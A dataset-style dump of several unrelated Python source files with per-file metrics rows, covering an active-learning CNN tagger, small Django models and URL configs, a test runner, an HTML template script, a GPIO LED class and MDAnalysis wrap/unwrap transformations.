value_to_return = query_index_random
filename="random.txt"
# Get hybrid index
if mode == "hybrid":
# least/most ratio is hardcoded
least_ratio = 1/3
most_ratio = 1 - least_ratio
# Compute hybrid indexing
query_index_least_rank = sequence_entropy_sort_index[:int(numSeqToQuery*(least_ratio))]
query_index_most_rank = sequence_entropy_sort_index[max((len(sequence_entropy_sort_index) - int(numSeqToQuery*(most_ratio))),0):]
value_to_return = np.concatenate((query_index_least_rank, query_index_most_rank), axis = -1)
filename="hybrid.txt"
# Store sequences in a file
if write_to_disk:
query_result_path = folder_path+"/"+"query_result"+"/"+filename
with open(query_result_path, "w", encoding = "utf-8") as f:
if verbose:
f.write("token target predicted entropy\r\r")
else:
f.write("-DOCSTART- -X- -X- o\r\r")
for i in value_to_return:
seq = X_w[i]
seq_offset = i*maxWords + seq_len - len(seq)
for j,w in enumerate(seq):
index = seq_offset + j
if verbose:
f.write(w + " " + true_flat[index] + " " + pred_flat[index] + " " + str(entropy_flat[index]) + "\r")
else:
if task == 1:
f.write(w + " " + true_flat[index] + " o o\r")
elif task == 2:
f.write(w + " o " + true_flat[index] + " o\r")
elif task == 3:
f.write(w + " o o " + true_flat[index] + "\r")
else:
raise Exception('Bad task given.')
f.write("\r")
print("CNN query has terminated!")
return value_to_return
def CNN_ActiveModel(task, X_train_w, X_test_w, X_valid_w, y_train_w, y_test_w, y_valid_w, tag_init_min_th, nbr_iters,
                    nbr_epochs, query_mode, inc_perc = 0.03, word_embedding_size = 100,
                    char_embedding_size = 50, pretrained_embedding="", folder_path="active_model", store_models = False):
    """
    Active learning platform, which does multiple training cycles.
    As a first step, preprocesses the data to unify digits under the same token and splits the train set into
    labelled/unlabelled datasets.
    Then, for each training cycle:
        - Processes the data to get indices and features for the given iteration.
        - Trains the model with the labelled dataset.
        - Queries references from the unlabelled dataset.
        - The queried references are removed from the unlabelled dataset and appended to the labelled dataset.
    :param task: task on which active learning is done, must be one of these values: "task1", "task2", "task3".
    :param X_train_w: Data to train the model, in the format of load_data function (in utils.py).
    :param y_train_w: Labels of the data to train the model, in the format of load_data function (in utils.py).
    :param X_test_w: Data to test the model, in the format of load_data function (in utils.py).
    :param y_test_w: Labels of the data to test the model, in the format of load_data function (in utils.py).
    :param X_valid_w: Data to validate the model, in the format of load_data function (in utils.py).
    :param y_valid_w: Labels of the data to validate the model, in the format of load_data function (in utils.py).
    :param tag_init_min_th: Number of tokens for each label in the first training cycle. See splitTrainData.
    :param nbr_iters: Number of training cycles.
    :param nbr_epochs: Number of epochs for each training cycle. Early stopping is not allowed.
    :param query_mode: How references are queried. Must be "least", "most", "hybrid", or "random".
    :param inc_perc: Percentage of sequences in X_train_w added at each iteration. Must be between 0 and 1.
    :param word_embedding_size: See CNN_model (in models.py).
    :param char_embedding_size: See CNN_model (in models.py).
    :param pretrained_embedding: See CNN_model (in models.py).
    :param folder_path: Where results, data and weights of each iteration will be stored.
    :param store_models: Store model weights and training dataset at each iteration.
    :return: List with one (best epoch, best F1 score) tuple per training cycle.
    """
    # Check parameters
    assert(tag_init_min_th > 0)
    assert(nbr_iters > 0)
    assert(inc_perc > 0 and inc_perc <= 1)
    if store_models:
        # The task name is only used to format the stored training files below,
        # so it is only validated when files will actually be written.
        if task.lower() == "task1" or task.lower() == "task2" or task.lower() == "task3":
            pass
        else:
            # Must be a valid task: "task1", "task2", "task3"
            print("Not a valid task.")
            raise AssertionError
    os.makedirs(folder_path, exist_ok=True)
    # Redirect all prints of this run into a log file; restored at the end.
    file, stdout_original = setPrintToFile("{0}/log.txt".format(folder_path))
    start_time = time.time()

    # STEP 0: PREPROCESS DATA
    print("Dataset creation and preprocessing.")
    # Merge digits using a specific token
    digits_word = "$NUM$"
    X_train_w, X_test_w, X_valid_w = mergeDigits([X_train_w, X_test_w, X_valid_w], digits_word)
    # Data split to get labelled and unlabelled data for the first iteration
    X_train_w_labelled, y_train_w_labelled, X_train_w_unlabelled, y_train_w_unlabelled = splitTrainData(X_train_w, y_train_w,
                                                                                                       tag_init_min_th)
    # Return values
    f1_scores = []
    for n_iter in range(nbr_iters):
        # Iteration strings
        print("\n --- ITERATION " + str(n_iter) + " ---\n")
        iter_task = "iter_{0}".format(n_iter)
        write_data_path = "{0}/iter_{1}/train_active.txt".format(folder_path, n_iter)
        weights_path = "{0}/iter_{1}/iter_{1}.h5".format(folder_path, n_iter)
        os.makedirs(folder_path + "/" + iter_task, exist_ok=True)

        # STEP 1: PROCESS DATA
        print("Dataset processing.")
        # Store dataset if requested
        if store_models:
            with open(write_data_path, "w", encoding="utf-8") as f:
                f.write("-DOCSTART- -X- -X- o\r\r")
                # Dump every labelled reference; index 0 is the conventional empty first line.
                for index, (ref_words, ref_tags) in enumerate(zip(X_train_w_labelled, y_train_w_labelled)):
                    if index == 0:
                        continue
                    for w, t in zip(ref_words, ref_tags):
                        if task.lower() == "task1":
                            f.write(w + " " + t + " o o\r")
                        elif task.lower() == "task2":
                            f.write(w + " o " + t + " o\r")
                        elif task.lower() == "task3":
                            f.write(w + " o o " + t + " \r")
                        else:
                            raise AssertionError
                    f.write("\r")
        # Compute indices for words+labels in the TRAINING data
        print("Word counting")
        ukn_words = "out-of-vocabulary"  # Out-of-vocabulary words entry in the "words to index" dictionary
        word2ind, ind2word = indexData_x(X_train_w_labelled, ukn_words)
        print("Label counting")
        label2ind, ind2label = indexData_y(y_train_w_labelled)
        # Convert data into indices data
        maxlen = max([len(xx) for xx in X_train_w_labelled])
        padding_style = 'pre'  # 'pre' or 'post': style of the padding, in order to have sequences of the same size
        # X padding
        print("Input")
        X_train = encodePadData_x(X_train_w_labelled, word2ind, maxlen, ukn_words, padding_style)
        X_test = encodePadData_x(X_test_w, word2ind, maxlen, ukn_words, padding_style)
        X_valid = encodePadData_x(X_valid_w, word2ind, maxlen, ukn_words, padding_style)
        X_unlabelled = encodePadData_x(X_train_w_unlabelled, word2ind, maxlen, ukn_words, padding_style)
        # y padding
        print("Labels")
        y_train = encodePadData_y(y_train_w_labelled, label2ind, maxlen, padding_style)
        y_test = encodePadData_y(y_test_w, label2ind, maxlen, padding_style)
        y_valid = encodePadData_y(y_valid_w, label2ind, maxlen, padding_style)
        y_unlabelled = encodePadData_y(y_train_w_unlabelled, label2ind, maxlen, padding_style)
        # Create the character level data
        print("Characters")
        char2ind, maxWords, maxChar = characterLevelIndex(X_train_w_labelled, digits_word)
        X_train_char = characterLevelData(X_train_w_labelled, char2ind, maxWords, maxChar, digits_word, padding_style)
        X_test_char = characterLevelData(X_test_w, char2ind, maxWords, maxChar, digits_word, padding_style)
        X_valid_char = characterLevelData(X_valid_w, char2ind, maxWords, maxChar, digits_word, padding_style)
        # BUG FIX: the character-level features of the unlabelled pool must be built
        # from the unlabelled *words* (X_train_w_unlabelled); previously the labels
        # (y_train_w_unlabelled) were passed here by mistake.
        X_unlabelled_char = characterLevelData(X_train_w_unlabelled, char2ind, maxWords, maxChar, digits_word, padding_style)

        # STEP 2: TRAIN MODEL
        print("Model training.")
        # Training parameters
        batch_size = 128
        # Train model
        epoch, precision, recall, f1 = CNN_model(iter_task, True, [X_train, X_train_char], [X_test, X_test_char], word2ind, maxWords,
                                                 [y_train], [y_test], [ind2label], maxChar, char2ind, pretrained_embedding =
                                                 pretrained_embedding, word_embedding_size = word_embedding_size,
                                                 char_embedding_size = char_embedding_size, validation=False, nbr_epochs = nbr_epochs,
                                                 batch_size = batch_size, optimizer='rmsprop', early_stopping_patience=-1,
                                                 folder_path=folder_path)
        f1_scores.append((epoch, f1))
        # This was the last iteration
        if n_iter == (nbr_iters - 1):
            print("Training finished.")
            break
        # There is no more data to label (only the conventional empty first line is left)
        if len(X_train_w_unlabelled) == 1 and X_train_w_unlabelled[0] == []:
            print("No more data to add! Training finished at iteration " + str(n_iter))
            break

        # STEP 3: SCORE UNLABELLED DATA
        print("Data scoring.")
        # Number of entries to retrieve from the unlabelled dataset, as a percentage of the whole training set.
        num_labelled = len(X_train_w_labelled) - 1
        num_unlabelled = len(X_train_w_unlabelled) - 1
        toQuery = int(inc_perc * (num_labelled + num_unlabelled))
        # Get score over sequence entropy
        to_label_index = CNN_query(iter_task, X_train_w_unlabelled, [X_unlabelled, X_unlabelled_char], y_unlabelled,
                                   toQuery, query_mode,
                                   word2ind, maxWords, [ind2label], maxChar, char2ind,
                                   pretrained_embedding = pretrained_embedding, word_embedding_size = word_embedding_size,
                                   char_embedding_size = char_embedding_size, optimizer='rmsprop', write_to_disk = False,
                                   folder_path=folder_path, print_to_file = False)
        # I don't need weights anymore
        # TODO: find a way to avoid writing/deletion on disk
        if not store_models and os.path.isfile(weights_path):
            os.remove(weights_path)

        # STEP 4: SPLIT DATA AND APPEND NEW LABELLED DATA
        print("Appending new data to train set.")
        to_label_index_set = set(to_label_index)
        to_label_w = []
        to_label_tag = []
        unlabelled_w = []
        unlabelled_tag = []
        # Split data; index 0 is the conventional empty first line and stays out of both splits.
        for i, seq in enumerate(X_train_w_unlabelled):
            if i == 0:
                continue
            if i in to_label_index_set:
                to_label_w.append(seq)
                to_label_tag.append(y_train_w_unlabelled[i])
            else:
                unlabelled_w.append(seq)
                unlabelled_tag.append(y_train_w_unlabelled[i])
        X_train_w_labelled = X_train_w_labelled + to_label_w
        y_train_w_labelled = y_train_w_labelled + to_label_tag
        X_train_w_unlabelled = [[]] + unlabelled_w
        y_train_w_unlabelled = [[]] + unlabelled_tag
        num_labelled = len(X_train_w_labelled) - 1
        num_unlabelled = len(X_train_w_unlabelled) - 1
        print("Labelled data: " + str(num_labelled) + " entries.")
        print("Unlabelled data: " + str(num_unlabelled) + " entries.")
        print("Usage of full train set: ", str(num_labelled / (num_labelled + num_unlabelled)) + " %.")

    # FINAL STEP: VALIDATION (reuses the data/model of the last completed iteration)
    print("Validation.")
    CNN_model(iter_task, False, [X_train, X_train_char], [X_test, X_test_char], word2ind, maxWords,
              [y_train], [y_test], [ind2label], maxChar, char2ind, word_embedding_size = word_embedding_size,
              char_embedding_size = char_embedding_size, pretrained_embedding = pretrained_embedding, validation=True,
              X_valid=[X_valid, X_valid_char], y_valid= [y_valid], folder_path=folder_path, gen_confusion_matrix=True)
    end_time = time.time()
    print("\n\nTotal training time: " + str(end_time - start_time) + " s.\n\n")
    print("Best F1 scores: ", f1_scores)
    closePrintToFile(file, stdout_original)
    # Return list with best F1 scores of each iteration
    return f1_scores
def splitTrainData(X_train_w, y_train_w, tag_min_threshold):
    """
    Splits the training dataset in two datasets, which we call "labelled" and "unlabelled"
    (it's just a convention, both datasets are actually labelled).
    It ensures that the labelled dataset contains a minimum number of entries for each label
    in the full training dataset. The function is used as an initialization for the first
    training iteration of the active learning model.
    Index 0 of the inputs is assumed to be the conventional empty first line: it is never
    placed in either split, and a fresh empty line is prepended to all four outputs.
    :param X_train_w: Data to train the model, in the format of load_data function (in utils.py).
    :param y_train_w: Labels of the data to train the model, in the format of load_data function (in utils.py).
    :param tag_min_threshold: Minimum number of tokens for each label in X_train_w.
    :return: Four lists: labelled data X, labelled data y, unlabelled data X, unlabelled data y.
    """
    # dict { tag -> count in dataset }
    tag_count = defaultdict(int)
    # dict { tag -> indices of sequences that contain tag }
    tag_index = defaultdict(set)
    # dict { tag -> number of times it has been encountered in the labelled split }
    tag_added = defaultdict(int)
    # Histogram of tags (the unused `filled_categories` counter was removed)
    for index, tag_seq in enumerate(y_train_w):
        if index == 0:
            continue
        for tag in tag_seq:
            tag_count[tag] += 1
            tag_index[tag].add(index)
    # Initialize indices of labelled and unlabelled datasets
    X_train_unlabelled_index = set(range(len(X_train_w)))
    X_train_labelled_index = set()
    # Create labelled and unlabelled datasets, rarest tags first so that infrequent
    # labels get a chance to reach the threshold before sequences run out.
    tag_count_sorted = sorted(tag_count.items(), key=operator.itemgetter(1))
    for (tag, count) in tag_count_sorted:
        for seq_index in tag_index[tag]:
            if tag_added[tag] < tag_min_threshold:
                if seq_index not in X_train_labelled_index:
                    X_train_labelled_index.add(seq_index)
                    X_train_unlabelled_index.remove(seq_index)
                    # Every tag of the newly added sequence counts towards its own threshold.
                    for curr_tag in y_train_w[seq_index]:
                        tag_added[curr_tag] += 1
            else:
                break
    # Create labelled dataset
    X_train_w_labelled = []
    y_train_w_labelled = []
    for ref_index in X_train_labelled_index:
        if ref_index == 0:
            continue
        X_train_w_labelled.append(X_train_w[ref_index])
        y_train_w_labelled.append(y_train_w[ref_index])
    # Create unlabelled dataset
    X_train_w_unlabelled = []
    y_train_w_unlabelled = []
    for ref_index in X_train_unlabelled_index:
        if ref_index == 0:
            continue
        X_train_w_unlabelled.append(X_train_w[ref_index])
        y_train_w_unlabelled.append(y_train_w[ref_index])
    num_labelled = len(X_train_w_labelled)
    num_unlabelled = len(X_train_w_unlabelled)
    total = num_labelled + num_unlabelled
    print("The dataset contains " + str(len(tag_count.keys())) + " labels.")
    print("Number of labelled entries: ", num_labelled)
    print("Number of unlabelled entries: ", num_unlabelled)
    # Guard against an empty dataset to avoid a ZeroDivisionError in the report.
    print("Usage of full train set: ", num_labelled / total if total else 0.0)
    # Finalize the dataset by prepending an empty line (default convention for datasets)
    X_train_w_labelled = [[]] + X_train_w_labelled
    y_train_w_labelled = [[]] + y_train_w_labelled
    X_train_w_unlabelled = [[]] + X_train_w_unlabelled
    y_train_w_unlabelled = [[]] + y_train_w_unlabelled
    return X_train_w_labelled, y_train_w_labelled, X_train_w_unlabelled, y_train_w_unlabelled
| 49.781837 | 149 | 0.642679 | 6,372 | 47,691 | 4.59479 | 0.0871 | 0.01578 | 0.010759 | 0.011613 | 0.737209 | 0.719892 | 0.705957 | 0.688811 | 0.671187 | 0.65206 | 0 | 0.011953 | 0.27198 | 47,691 | 958 | 150 | 49.781837 | 0.831308 | 0.337925 | 0 | 0.608611 | 0 | 0 | 0.056133 | 0.001753 | 0 | 0 | 0 | 0.001044 | 0.011742 | 1 | 0.011742 | false | 0.001957 | 0.041096 | 0 | 0.060665 | 0.072407 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
c5f341976dcff16eb86b4a3fc138156fa21c68a9 | 393 | py | Python | ffa/accounts/models.py | kschweizer/fresnofieldarchers | c044ff5bea66289124d23c4955454749029319e4 | [
"MIT"
] | null | null | null | ffa/accounts/models.py | kschweizer/fresnofieldarchers | c044ff5bea66289124d23c4955454749029319e4 | [
"MIT"
] | 7 | 2020-06-21T03:53:27.000Z | 2022-02-14T22:53:42.000Z | ffa/accounts/models.py | kschweizer/fresnofieldarchers | c044ff5bea66289124d23c4955454749029319e4 | [
"MIT"
] | null | null | null | from django.contrib.auth.models import AbstractUser
from django.db import models
import uuid
def user_email(instance, filename):
    """Build the avatar upload path for a member: ``users/user_<user>/<filename>``."""
    return 'users/user_{u}/{f}'.format(u=instance.user, f=filename)
# Create your models here.
class Member(AbstractUser):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
avatar = models.ImageField(upload_to=user_email, blank=True) | 39.3 | 79 | 0.778626 | 55 | 393 | 5.472727 | 0.690909 | 0.066445 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008596 | 0.111959 | 393 | 10 | 80 | 39.3 | 0.853868 | 0.061069 | 0 | 0 | 0 | 0 | 0.048913 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.375 | 0.125 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 3 |
680d7be5c74ae7e121072f17cdb11a8624fc8c38 | 190 | py | Python | tests/__init__.py | tb0hdan/voiceplay | 3e35a25cfcf982a3871cf0d819bae4374ee31ecf | [
"Unlicense"
] | 2 | 2017-03-22T10:02:07.000Z | 2020-08-02T11:56:47.000Z | tests/__init__.py | tb0hdan/twigator_project | 775f213cff8b122c7e79b0cd420aeb814193e73e | [
"BSD-3-Clause"
] | 69 | 2016-12-10T22:27:47.000Z | 2017-12-14T05:15:43.000Z | tests/__init__.py | tb0hdan/twigator_project | 775f213cff8b122c7e79b0cd420aeb814193e73e | [
"BSD-3-Clause"
] | null | null | null | import unittest
def mytestrunner(tc):
    """Run every TestCase class in *tc* with a verbose text runner."""
    loader = unittest.TestLoader()
    suite = unittest.TestSuite(loader.loadTestsFromTestCase(case) for case in tc)
    unittest.TextTestRunner(verbosity=2).run(suite)
| 31.666667 | 95 | 0.773684 | 22 | 190 | 6.681818 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005917 | 0.110526 | 190 | 5 | 96 | 38 | 0.863905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
680e4e8c42d7a6ebe0e085174eca520c345f7232 | 952 | py | Python | user/vistas/templates/votacion.py | ZerpaTechnology/occoa | a8c0bd2657bc058801a883109c0ec0d608d04ccc | [
"Apache-2.0"
] | null | null | null | user/vistas/templates/votacion.py | ZerpaTechnology/occoa | a8c0bd2657bc058801a883109c0ec0d608d04ccc | [
"Apache-2.0"
] | null | null | null | user/vistas/templates/votacion.py | ZerpaTechnology/occoa | a8c0bd2657bc058801a883109c0ec0d608d04ccc | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Python 2 template script: emits the HTML of the "votacion" (voting) page to
# stdout. incluir() -- presumably a template-include helper taking the context
# dict `data`; confirm against the caller -- renders the shared fragments.
print '''<!DOCTYPE html><html>'''
incluir(data,"head")
print '''<body class="container-fluid sin-marg pad-r08 pad-l08 ff">'''
incluir(data,"header")
# Prints an empty line between the header and hero fragments.
print ''''''
incluir(data,"hero")
# Search box and registration section; note the <img src=" attribute is left
# open here and completed by the next two prints.
print '''<section class="row"><div class="col-md-12"><div class="text-center bg-ubuntu_jet"> <div> <input type="" name="" placeholder="Buscar votación"> </div></div><h1>Inscribete</h1><img src="'''
print data['base_url']+'static/imgs/marker/institucion-default.png'
print '''"><span> Nombre de la votación</span></div><form><label>Nombres: </label><input type="text" name="" placeholder="Nombre"><label>Apellidos: </label><input type="text" name="" placeholder="Nombre"><label>Foto de perfil: </label><input type="file" name="" placeholder="Nombre"><label>Expediente: </label><input type="text" name="" placeholder="Nombre"><input type="submit" name="" value="Registrarme"></form></section>'''
incluir(data,"footer")
print '''</body></html>'''
| 73.230769 | 427 | 0.677521 | 130 | 952 | 4.946154 | 0.507692 | 0.083981 | 0.087092 | 0.083981 | 0.197512 | 0.197512 | 0.197512 | 0.136858 | 0 | 0 | 0 | 0.010169 | 0.070378 | 952 | 12 | 428 | 79.333333 | 0.716384 | 0.022059 | 0 | 0 | 0 | 0.181818 | 0.82239 | 0.361679 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.636364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
a83b4352002f5259f76291921bac626b9064a4c6 | 206 | py | Python | robotoy/components/searchlight.py | youwen5/robotoy | 3a7c8465cd332f520e911be654be2d2d54fa0ccb | [
"MIT"
] | null | null | null | robotoy/components/searchlight.py | youwen5/robotoy | 3a7c8465cd332f520e911be654be2d2d54fa0ccb | [
"MIT"
] | null | null | null | robotoy/components/searchlight.py | youwen5/robotoy | 3a7c8465cd332f520e911be654be2d2d54fa0ccb | [
"MIT"
] | null | null | null | from gpiozero import RGBLED
from . import pins
from ..singleton import singleton
@singleton
class SearchLight(RGBLED):
    """RGB LED used as the robot's searchlight.

    The @singleton decorator presumably guarantees one shared instance (and
    thus a single claim on the GPIO pins) -- confirm in singleton.py.
    """

    def __init__(self):
        # Bind the LED to the R/G/B GPIO pins defined centrally in pins.py.
        super().__init__(pins.LED_R, pins.LED_G, pins.LED_B)
| 20.6 | 60 | 0.737864 | 29 | 206 | 4.862069 | 0.551724 | 0.148936 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165049 | 206 | 9 | 61 | 22.888889 | 0.819767 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.428571 | 0 | 0.714286 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
a84cbd734fb0adfbd3ccba3169f4eebe7b8d8fb8 | 171 | py | Python | Resources/Enums.py | HeroicosHM/NAUDiscordVerification | 93c46a9098228ffee24c90cc57fc9896ebaf0d34 | [
"MIT"
] | 1 | 2020-07-31T09:13:42.000Z | 2020-07-31T09:13:42.000Z | Resources/Enums.py | HeroicosHM/NAUDiscordVerification | 93c46a9098228ffee24c90cc57fc9896ebaf0d34 | [
"MIT"
] | null | null | null | Resources/Enums.py | HeroicosHM/NAUDiscordVerification | 93c46a9098228ffee24c90cc57fc9896ebaf0d34 | [
"MIT"
] | null | null | null | from enum import Enum
# Simple enum to force player type to either be casual or competitive
class PlayerType(Enum):
    """Closed set of player types: a player is either casual or competitive."""

    Casual = "casual"
    Competitive = "competitive"
| 24.428571 | 69 | 0.74269 | 23 | 171 | 5.521739 | 0.652174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.19883 | 171 | 6 | 70 | 28.5 | 0.927007 | 0.391813 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
a865a5db1f3090d86d004389554eb2824ef0a3e0 | 202 | py | Python | rest/rest/urls.py | piwnk/ecb-currencies-fetch | 77a8630d0a54854d2b475ac05580ebb9ec4406c3 | [
"MIT"
] | null | null | null | rest/rest/urls.py | piwnk/ecb-currencies-fetch | 77a8630d0a54854d2b475ac05580ebb9ec4406c3 | [
"MIT"
] | null | null | null | rest/rest/urls.py | piwnk/ecb-currencies-fetch | 77a8630d0a54854d2b475ac05580ebb9ec4406c3 | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.urls import path, include
from restapp import views
# Top-level URL routes for the project.
urlpatterns = [
    # Django admin interface under /admin/.
    path('admin/', admin.site.urls),
    # Everything else is delegated to the restapp application's URLconf.
    path('', include('restapp.urls')),
]
| 20.2 | 39 | 0.673267 | 25 | 202 | 5.44 | 0.48 | 0.147059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.19802 | 202 | 9 | 40 | 22.444444 | 0.839506 | 0 | 0 | 0 | 0 | 0 | 0.093264 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.428571 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
a88d852fd42c47800b549b9625af15e65db5627c | 4,580 | py | Python | venv/lib/python3.7/site-packages/MDAnalysis/transformations/wrap.py | dtklinh/GBRDE | c87fada492f24943d7d6b6ecda61c67f41d5bf83 | [
"MIT"
] | 2 | 2021-03-04T16:57:06.000Z | 2021-08-11T01:42:29.000Z | venv/lib/python3.7/site-packages/MDAnalysis/transformations/wrap.py | dtklinh/GBRDE | c87fada492f24943d7d6b6ecda61c67f41d5bf83 | [
"MIT"
] | null | null | null | venv/lib/python3.7/site-packages/MDAnalysis/transformations/wrap.py | dtklinh/GBRDE | c87fada492f24943d7d6b6ecda61c67f41d5bf83 | [
"MIT"
] | null | null | null | # -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
# MDAnalysis --- https://www.mdanalysis.org
# Copyright (c) 2006-2017 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
"""\
Wrap/unwrap transformations --- :mod:`MDAnalysis.transformations.wrap`
======================================================================
Wrap/unwrap the atoms of a given AtomGroup in the unit cell. :func:`wrap`
translates the atoms back in the unit cell. :func:`unwrap` translates the
atoms of each molecule so that bons don't split over images.
.. autofunction:: wrap
.. autofunction:: unwrap
"""
from __future__ import absolute_import
from ..lib._cutil import make_whole
def wrap(ag, compound='atoms'):
    """
    Build a trajectory transformation that shifts *ag* back into the unit cell.

    Example
    -------
    .. code-block:: python

        ag = u.atoms
        transform = mda.transformations.wrap(ag)
        u.trajectory.add_transformations(transform)

    Parameters
    ----------
    ag : Atomgroup
        Atomgroup to be wrapped in the unit cell.
    compound : {'atoms', 'group', 'residues', 'segments', 'fragments'}, optional
        The group which will be kept together through the shifting process.
        The translation is calculated per compound and applied to every atom
        in it, so a compound is never broken by the shift -- although some of
        its atoms may end up outside the unit cell (its center stays inside).

    Returns
    -------
    MDAnalysis.coordinates.base.Timestep
    """
    def _transform(ts):
        # Delegate the wrapping to the AtomGroup; the timestep is passed
        # through unchanged so transformations can be chained.
        ag.wrap(compound=compound)
        return ts

    return _transform
def unwrap(ag):
    """
    Build a trajectory transformation that makes each molecule in *ag* whole.

    Atom positions are modified in place: every fragment of the AtomGroup is
    translated so that none of its bonds is split across periodic images.
    This is most useful after atoms have been packed into the primary unit
    cell, which can leave a molecule appearing on both sides of the box and
    breaks operations such as computing its center of mass.

    Example
    -------
    .. code-block:: python

        ag = u.atoms
        transform = mda.transformations.unwrap(ag)
        u.trajectory.add_transformations(transform)

    Parameters
    ----------
    ag : AtomGroup
        The :class:`MDAnalysis.core.groups.AtomGroup` to work with.
        The positions of this are modified in place.

    Returns
    -------
    MDAnalysis.coordinates.base.Timestep
    """
    # Fail early with a clear message when the group cannot provide fragments.
    try:
        ag.fragments
    except AttributeError:
        raise AttributeError("{} has no fragments".format(ag))

    def _transform(ts):
        for molecule in ag.fragments:
            make_whole(molecule)
        return ts

    return _transform
| 30.738255 | 80 | 0.54345 | 529 | 4,580 | 4.6862 | 0.47448 | 0.02259 | 0.026624 | 0.015732 | 0.19766 | 0.086325 | 0.086325 | 0.045986 | 0.045986 | 0.045986 | 0 | 0.026705 | 0.321397 | 4,580 | 148 | 81 | 30.945946 | 0.770914 | 0.802402 | 0 | 0.352941 | 0 | 0 | 0.04428 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.235294 | false | 0 | 0.117647 | 0 | 0.588235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
a8965f62e72384c8b9369d29d715fa8ae7318a10 | 226 | py | Python | checkout/urls.py | mahanfarzaneh2000/DjangoEcommerce | f844f60fd4eac6c7513196037cd908df3ba01983 | [
"CC0-1.0"
] | 1 | 2020-11-01T11:35:12.000Z | 2020-11-01T11:35:12.000Z | checkout/urls.py | mahanfarzaneh2000/DjangoEcommerce | f844f60fd4eac6c7513196037cd908df3ba01983 | [
"CC0-1.0"
] | null | null | null | checkout/urls.py | mahanfarzaneh2000/DjangoEcommerce | f844f60fd4eac6c7513196037cd908df3ba01983 | [
"CC0-1.0"
] | null | null | null | from django.urls import path
from .views import CheckoutView , SubmitPromoView
